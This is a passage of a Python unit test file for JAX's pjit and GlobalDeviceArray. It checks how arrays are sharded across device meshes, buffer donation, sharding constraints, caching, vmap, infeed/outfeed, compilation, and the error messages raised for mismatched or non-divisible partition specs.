return x
shape = (2, 2)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x)
expected = x
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 1)
self.assertAllClose(
actual.device_buffers[0].to_py(), expected, check_dtypes=False)
# Repro for a bug on device_buffer aval
_ = repr(actual.device_buffers)
@jtu.with_mesh([('x', 2)])
def testBasic1D(self):
@partial(pjit,
in_axis_resources=(P('x'), P('x')),
out_axis_resources=None)
def f(x, y):
return x + y
shape = (8, 8)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x, x + 1)
expected = x + (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testBasic2D(self):
@partial(pjit,
in_axis_resources=(P(None, 'x', 'y'), P('y')),
out_axis_resources=P('x'))
def f(x, y):
return x @ y
x_shape = (8, 6, 4)
y_shape = (4, 2)
x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
actual = f(x, y)
expected = x @ y
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
split0, split1 = np.split(expected, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), split1,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), split1,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testTwoMeshAxisSharding(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
actual = f(x, x + 1)
expected = x @ (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2)])
def testBufferDonation(self):
@partial(pjit,
in_axis_resources=P('x'),
out_axis_resources=P('x'),
donate_argnums=0)
def f(x, y):
return x + y
shard = pjit(lambda x: x, in_axis_resources=P('x'),
out_axis_resources=P('x'))
x = shard(jnp.ones((2, 5)) * 4)
y = shard(jnp.ones((2, 5)) * 2)
expected = x + y
self.assertAllClose(f(x, y), expected)
self.assertNotDeleted(y)
self.assertDeleted(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraint(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
y = x + 1
y = with_sharding_constraint(y, P('x', 'y'))
return y * 2
shape = (8, 8)
x = np.arange(prod(shape)).reshape(shape)
expected = (x + 1) * 2
actual = f(x)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
hlo = jax.xla_computation(f)(np.ones(shape))
# Annotation from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraintPyTree(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
x = with_sharding_constraint(x, [P('x', 'y'), P('y', 'x')])
x = x.copy()
x[0]["a"] *= 2
return x
shape = (8, 8)
v = np.arange(prod(shape)).reshape(shape)
x = [{"a": v, "b": v * 2}, v * 3]
actual = f(x)
expected = x.copy()
expected[0]["a"] *= 2
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertLen(actual[0]["a"].device_buffers, 2)
hlo = jax.xla_computation(f)(x)
# Annotations from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
self.assertIn("sharding={devices=[1,2]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
def testCaching(self):
def f(x):
assert should_be_tracing
return jnp.sin(x) * 2
x = np.arange(16).reshape(4, 4)
devices = np.array(list(jax.local_devices())[:4])
if devices.size < 4:
raise unittest.SkipTest("Test requires 4 devices")
devices = devices.reshape((2, 2))
with mesh(devices, ('x', 'y')):
should_be_tracing = True
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
# Re-create the mesh to make sure that has no influence on caching
with mesh(devices, ('x', 'y')):
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testNested(self):
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
g = pjit(lambda x: f(jnp.sin(x)), in_axis_resources=P('x', None), out_axis_resources=None)
x = jnp.arange(16).reshape((4, 4))
y = g(x)
self.assertAllClose(y, jnp.sin(x).sum() + h.sum())
self.assertTrue(hasattr(y, "sharding_spec"))
@check_1d_2d_mesh(set_mesh=True)
def testAutodiff(self, mesh, resources):
if len(mesh) != 2: return
assert resources == ('x', 'y')
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum(1) * h.sum(),
in_axis_resources=P('x', 'y'), out_axis_resources=P(('x', 'y')))
g = pjit(lambda x: f(jnp.sin(x * 4 + 2)),
in_axis_resources=P('x', None), out_axis_resources=P(('x', 'y')))
jtu.check_grads(g, (jnp.arange(16, dtype=jnp.float32).reshape((4, 4)) / 100,),
order=2)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testEvalJaxpr(self):
x, y = jnp.arange(4), jnp.arange(5)
f = pjit(lambda x, y: x.sum() + jnp.sin(y),
in_axis_resources=(P('x'), P('y')),
out_axis_resources=P('y'))
f_jaxpr = jax.make_jaxpr(f)(x, y)
f_eval = jax.core.jaxpr_as_fun(f_jaxpr)
r, = f_eval(x, y)
self.assertAllClose(r, x.sum() + jnp.sin(y))
@jtu.with_mesh([('x', 2)])
def testNonArrayArg(self):
self.assertEqual(pjit(lambda x: x + 2,
in_axis_resources=None,
out_axis_resources=None)(1), 3)
@jtu.with_mesh([('x', 2)])
def testNonHashableAxisResources(self):
x = jnp.arange(4)
y = pjit(lambda x: {'b': x['a'] + 2},
in_axis_resources=({'a': P('x')},),
out_axis_resources={'b': P('x')})({'a': x})
self.assertAllClose(y, {'b': x + 2})
@jtu.with_mesh([('x', 2)])
def testGradOfConstraint(self):
# TODO(b/213927860): XLA incorrectly simplifies away the sharding constraint
# on the output.
if config.jax_enable_mlir:
raise unittest.SkipTest("test fails with jax_enable_mlir")
# Make sure that we can compute grads through sharding constraints
h = lambda x: jnp.sin(with_sharding_constraint(x, P('x'))).sum()
f = pjit(lambda x: jax.grad(h)(x),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(8, dtype=jnp.float32)
self.assertAllClose(f(x), jnp.cos(x))
@jtu.with_mesh([('x', 2)])
def testNoopPartitionSpecs(self):
noops = [P(), P(None), P(()), P((), None), P(None, None, ())]
x = jnp.arange(8).reshape((2, 2, 2))
for spec in noops:
y = pjit(lambda x: x * 2, in_axis_resources=spec, out_axis_resources=spec)(x)
self.assertAllClose(y, x * 2)
@jtu.with_mesh([('x', 2)])
def testVmapModifiesAxisResources(self):
h = pjit(lambda x, y: (x + y, x, y), in_axis_resources=P('x'), out_axis_resources=None)
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(h, in_axes=(None, 0)))(x, y).jaxpr
eqn = jaxpr.eqns[0]
self.assertIs(eqn.primitive, pjit_p)
x_sync, y_sync = (spec.sync for spec in eqn.params['in_axis_resources'])
self.assertEqual(x_sync, SpecSync.IN_SYNC)
self.assertEqual(y_sync, SpecSync.DIM_PERMUTE)
x_sync, y_sync, z_sync = (spec.sync for spec in eqn.params['out_axis_resources'])
self.assertEqual(x_sync, SpecSync.DIM_PERMUTE)
self.assertEqual(y_sync, SpecSync.IN_SYNC)
self.assertEqual(z_sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2)])
def testVMap(self):
f = pjit(lambda x, y: (x + y, x), in_axis_resources=P('x'), out_axis_resources=P('x'))
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
z, w = jax.vmap(f, in_axes=(None, 0), out_axes=(0, None))(x, y)
self.assertAllClose(z, x + y)
self.assertAllClose(w, x)
self.assertEqual(z.sharding_spec.sharding, (pxla.NoSharding(), pxla.Chunked([2])))
self.assertEqual(w.sharding_spec.sharding, (pxla.Chunked([2]),))
@jtu.with_mesh([('x', 2)])
def testVMapShardingConstraint(self):
f = pjit(lambda x: with_sharding_constraint(x, P('x')),
in_axis_resources=P(), out_axis_resources=P('x'))
x = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(f))(x)
pjit_eqn, = jaxpr.eqns
constraint_eqn, = pjit_eqn.params['jaxpr'].eqns
self.assertEqual(constraint_eqn.params['axis_resources'].partitions, ((), ('x',)))
self.assertEqual(constraint_eqn.params['axis_resources'].sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingInXMap(self):
h = pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)
f = xmap(lambda x: h(x * 2), in_axes=['i', ...], out_axes=['i', ...],
axis_resources={'i': 'y'})
x = jnp.arange(16).reshape((4, 4))
rule = xla._translations[pjit_p]
test_rule_called = False
def _test_rule(*args, **kwargs):
nonlocal test_rule_called
test_rule_called = True
in_axis_resources = kwargs['in_axis_resources']
self.assertEqual(len(in_axis_resources), 1)
self.assertIn(('y',), in_axis_resources[0].partitions)
return rule(*args, **kwargs)
try:
xla._translations[pjit_p] = _test_rule
f(x)
self.assertTrue(test_rule_called)
finally:
xla._translations[pjit_p] = rule
@jtu.with_mesh([('x', 2)])
def testLowerWithDuckTyping(self):
x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
# Make sure this doesn't crash
pjit(lambda x: x + 4,
in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
@jtu.with_mesh([('x', 2)])
def testLowerDonateArgnumsAvailable(self):
x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
def f(*args):
x, *_ = args
return x
f_low = pjit(f, donate_argnums=(0,),
in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
f_com = f_low.compile()
f_low.donate_argnums == f_com.donate_argnums == (0,)
def testInfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f_for_jit(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(z,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(w,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
return x + y + z + w
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
y = x * 2.
z = x * 3.
w = x * 4.
# Transfer data to infeed before executing the function. For GPUs, the
# execution of the compiled function is blocking, so transferring data
# to infeed before executing ensures that the execution does not deadlock
# waiting for the infeed data.
logging.info('Transfering to infeed for the jit call')
d = devices[0]
d.transfer_to_infeed((y,))
d.transfer_to_infeed((z,))
d.transfer_to_infeed((w,))
# JIT
logging.info('Making jit call')
res0 = jax.jit(f_for_jit)(x)
self.assertAllClose(res0, x + y + z + w, check_dtypes=True)
# PJIT
def f_for_pjit(x):
token = lax.create_token(x)
# A replicated infeed
(y,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(None,))
# An infeed sharded on first axis
(z,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(nr_devices, 1),))
# An infeed sharded on second axis
(w,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(1, nr_devices),))
return x + y + z + w
logging.info('Transfering to infeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array to all devices for replicated.
d.transfer_to_infeed((y,))
# For sharded infeed, transfer only the needed slices to each device.
d.transfer_to_infeed((z[3 * didx:3 * didx + 3, :]))
d.transfer_to_infeed((w[:, 5 * didx:5 * didx + 5],))
with mesh(devices, ['d']):
logging.info('Making pjit call')
res = pjit(
f_for_pjit, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(
x)
self.assertAllClose(res0, res, check_dtypes=True)
def testOutfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f(x):
token = lax.create_token(x)
token = lax.outfeed(token, x, partitions=(None,))
token = lax.outfeed(token, x, partitions=(P(nr_devices, 1),))
token = lax.outfeed(token, x, partitions=(P(1, nr_devices),))
return x
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
def dispatch():
with mesh(devices, ['d']):
logging.info('Making pjit call')
pjit(f, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(x)
execution = threading.Thread(target=dispatch)
execution.start()
def check_outfeed(d, x):
y, = d.transfer_from_outfeed(
xla_client.shape_from_pyval((x,)).with_major_to_minor_layout_if_absent())
self.assertAllClose(x, y, check_dtypes=True)
logging.info('Transfering from outfeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array from all devices for replicated.
check_outfeed(d, x)
# For sharded outfeed, the results are sliced.
check_outfeed(d, x[3 * didx:3 * didx + 3, :])
check_outfeed(d, x[:, 5 * didx:5 * didx + 5])
execution.join()
@jtu.with_mesh([('x', 2)])
def testWithCustomPRNGKey(self):
if not config.jax_enable_custom_prng:
raise unittest.SkipTest("test requires jax_enable_custom_prng")
key = jax.prng.seed_with_impl(jax.prng.rbg_prng_impl, 87)
# Make sure this doesn't crash
pjit(lambda x: x, in_axis_resources=(None), out_axis_resources=(None))(key)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompile(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
expected = x @ (x + 1)
exe = f.lower(x, x + 1).compile()
actual = exe(x, x + 1)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileWithKwargs(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y, **kwargs):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
NotImplementedError,
"function was compiled by a transformation that does not support "
"keyword arguments, but called with keyword arguments: a, b",
lambda: exe(x, x + 1, a=1, b=2))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileInTreeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
TypeError, "function compiled for .*, called with .*",
lambda: exe([x], [x + 1]))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileArgTypeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
x_f32 = x.astype(jnp.float32)
x_i32 = x.astype(jnp.int32)
exe = f.lower(x_f32, x_f32).compile()
self.assertRaisesRegex(
TypeError,
"Computation compiled for input types:\n.*float32.*\n"
"called with:\n.*int32.*",
lambda: exe(x_i32, x_i32))
class GDAPjitTest(jtu.JaxTestCase):
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_single_output(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
def f(x):
return x @ x.T
expected_matrix_mul = input_data @ input_data.T
out = f(gda_obj)
self.assertIsInstance(out, global_device_array.GlobalDeviceArray)
self.assertEqual(out.shape, (8, 8))
self.assertEqual(out.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out._global_mesh.shape, {'x': 4, 'y': 2})
for s in out.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
out2 = f(out)
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
with self.assertRaisesRegex(
ValueError, ('For a non-GDA input, the corresponding resource in '
'in_axis_resources cannot be `pjit.FROM_GDA`.')):
f(input_data)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_multi_input_multi_output(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
mesh_axes1 = P('x', 'y')
gda1 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes1, cb)
mesh_axes2 = P('x')
gda2 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes2, cb)
mesh_axes3 = P(('x', 'y'))
gda3 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes3, cb)
mesh_axes4 = P(None)
gda4 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes4, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(
pjit,
# `FROM_GDA` will be replicated for all the inputs.
in_axis_resources=FROM_GDA,
out_axis_resources=(mesh_axes1, mesh_axes4, mesh_axes2, mesh_axes3))
def f(x, y, z, a):
return x @ x.T, y, z, a
out1, out2, out3, out4 = f(gda1, gda2, gda3, gda4)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertEqual(out1.local_shards[0].index, (slice(0, 2), slice(0, 4)))
self.assertEqual(out1.local_shards[1].index, (slice(0, 2), slice(4, 8)))
self.assertListEqual([s.replica_id for s in out1.local_shards],
[0, 0, 0, 0, 0, 0, 0, 0])
expected_matrix_mul = input_data @ input_data.T
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 2))
self.assertEqual(out2.local_shards[0].data.shape, (8, 2))
self.assertEqual(out2.local_shards[0].index, (slice(None), slice(None)))
self.assertEqual(out2.local_shards[1].index, (slice(None), slice(None)))
self.assertListEqual([s.replica_id for s in out2.local_shards],
[0, 1, 2, 3, 4, 5, 6, 7])
for s in out2.local_shards:
self.assertArraysEqual(s.data, input_data)
self.assertIsInstance(out3, global_device_array.GlobalDeviceArray)
self.assertEqual(out3.shape, (8, 2))
self.assertEqual(out3.local_shards[0].data.shape, (2, 2))
self.assertEqual(out3.local_shards[0].index, (slice(0, 2), slice(None)))
self.assertEqual(out3.local_shards[1].index, (slice(0, 2), slice(None)))
self.assertListEqual([s.replica_id for s in out3.local_shards],
[0, 1, 0, 1, 0, 1, 0, 1])
for s in out3.local_shards:
self.assertArraysEqual(s.data, input_data[s.index])
self.assertIsInstance(out4, global_device_array.GlobalDeviceArray)
self.assertEqual(out4.shape, (8, 2))
self.assertEqual(out4.local_shards[0].data.shape, (1, 2))
self.assertEqual(out4.local_shards[0].index, (slice(0, 1), slice(None)))
self.assertEqual(out4.local_shards[1].index, (slice(1, 2), slice(None)))
self.assertListEqual([s.replica_id for s in out4.local_shards],
[0, 0, 0, 0, 0, 0, 0, 0])
for s in out4.local_shards:
self.assertArraysEqual(s.data, input_data[s.index])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_mixed_inputs(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit,
in_axis_resources=(FROM_GDA, P('x', 'y')),
out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
def f(x, y):
return x @ x.T, y @ y.T
expected_matrix_mul = input_data @ input_data.T
out1, out2 = f(gda_obj, input_data)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out1._global_mesh.shape, {'x': 4, 'y': 2})
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 8))
self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
self.assertDictEqual(out2._global_mesh.shape, {'x': 4, 'y': 2})
for s in out2.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_non_gda_inputs(self):
input_shape = (8, 2)
input_data = np.arange(prod(input_shape)).reshape(input_shape)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit,
in_axis_resources=(None, P('x', 'y')),
out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
def f(x, y):
return x @ x.T, y @ y.T
expected_matrix_mul = input_data @ input_data.T
out1, out2 = f(input_data, input_data)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out1._global_mesh.shape, {'x': 4, 'y': 2})
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 8))
self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
self.assertDictEqual(out2._global_mesh.shape, {'x': 4, 'y': 2})
for s in out2.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
@jtu.with_mesh([('x', 2), ('y', 2)])
def test_pjit_gda_mesh_mismatch(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = ['x', 'y']
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with self.assertRaisesRegex(ValueError,
"Pjit's mesh and GDA's mesh should be equal."):
@partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
def f(x):
return x
f(gda_obj)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_wrong_resource_for_gda_input(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = ['x']
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with self.assertRaisesWithLiteralMatch(
ValueError,
"Got an input GDA to pjit with different partitioning than specified "
'in the in_axis_resources argument to pjit. The partitioning must '
'match, or use `jax.experimental.pjit.FROM_GDA` in `in_axis_resources`. '
"Got GDA spec: PartitionSpec('x',) and "
"pjit spec: PartitionSpec('x', 'y') "
'for GDA: GlobalDeviceArray(shape=(8, 2), dtype=float32)'):
@partial(pjit, in_axis_resources=P('x', 'y'), out_axis_resources=P('x', 'y'))
def f(x):
return x
f(gda_obj)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_caching(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(input_shape), dtype=np.float32).reshape(input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
input_shape, global_mesh, mesh_axes, cb)
trace_counter = [0]
@partial(pjit, in_axis_resources=mesh_axes, out_axis_resources=P('x', 'y'))
def f(x, y):
trace_counter[0] += 1
return x @ y.T
f(gda_obj, gda_obj)
self.assertListEqual(trace_counter, [1])
f(gda_obj, gda_obj)
self.assertListEqual(trace_counter, [1])
f(input_data, input_data)
self.assertListEqual(trace_counter, [2])
f(gda_obj, input_data)
self.assertListEqual(trace_counter, [3])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_partition_spec_mismatch_semantically_equivalent(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = [None]
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
with jax._src.config.parallel_functions_output_gda(True):
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
@partial(pjit, in_axis_resources=P(None), out_axis_resources=P(None))
def f(x):
return x
output_gda = f(gda_obj)
# Ensure output_gda._mesh_axes = P() is matched with P(None).
self.assertEqual(output_gda._mesh_axes, ())
# P(None) is in_axis_resources.
f(output_gda)
def test_from_gda_duplicates(self):
global_mesh = create_global_mesh((1, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = ['x', 'y']
input_gda = create_gda(global_input_shape, global_mesh, mesh_axes)
# It's occasionally possible to end up with two FROM_GDA singletons (e.g. if
# pickling in_axis_resources and sending to other processes). Make sure this
# this doesn't cause an error to avoid user confusion.
from_gda_dup = pjit_lib._FromGdaSingleton()
with mesh(global_mesh.devices, global_mesh.axis_names):
pjit(lambda x: x, in_axis_resources=from_gda_dup, out_axis_resources=None)(
input_gda)
def test_no_recompilation_due_to_in_axis_resources(self):
global_mesh = create_global_mesh((1, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P(None,)
input_gda = create_gda(global_input_shape, global_mesh, mesh_axes)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit, in_axis_resources=mesh_axes, out_axis_resources=mesh_axes)
def f(x):
return x
with mesh(global_mesh.devices, global_mesh.axis_names):
out_gda = f(input_gda)
self.assertEqual(out_gda._mesh_axes, ())
before_cache = pjit_lib._pjit_lower.cache_info()
f(out_gda)
after_cache = pjit_lib._pjit_lower.cache_info()
self.assertNotEqual(id(before_cache), id(after_cache))
self.assertEqual(before_cache.hits + 1, after_cache.hits)
self.assertEqual(before_cache.misses, after_cache.misses)
def spec_regex(s):
return str(s).replace(r"(", r"\(").replace(r")", r"\)")
class PJitErrorTest(jtu.JaxTestCase):
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleArgs(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleOuts(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=P(resources, None))(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleConstraint(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources,)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r".*implies that the size of "
r"its dimension 0 should be divisible by " + mesh_size +
r", but it is equal to 3"):
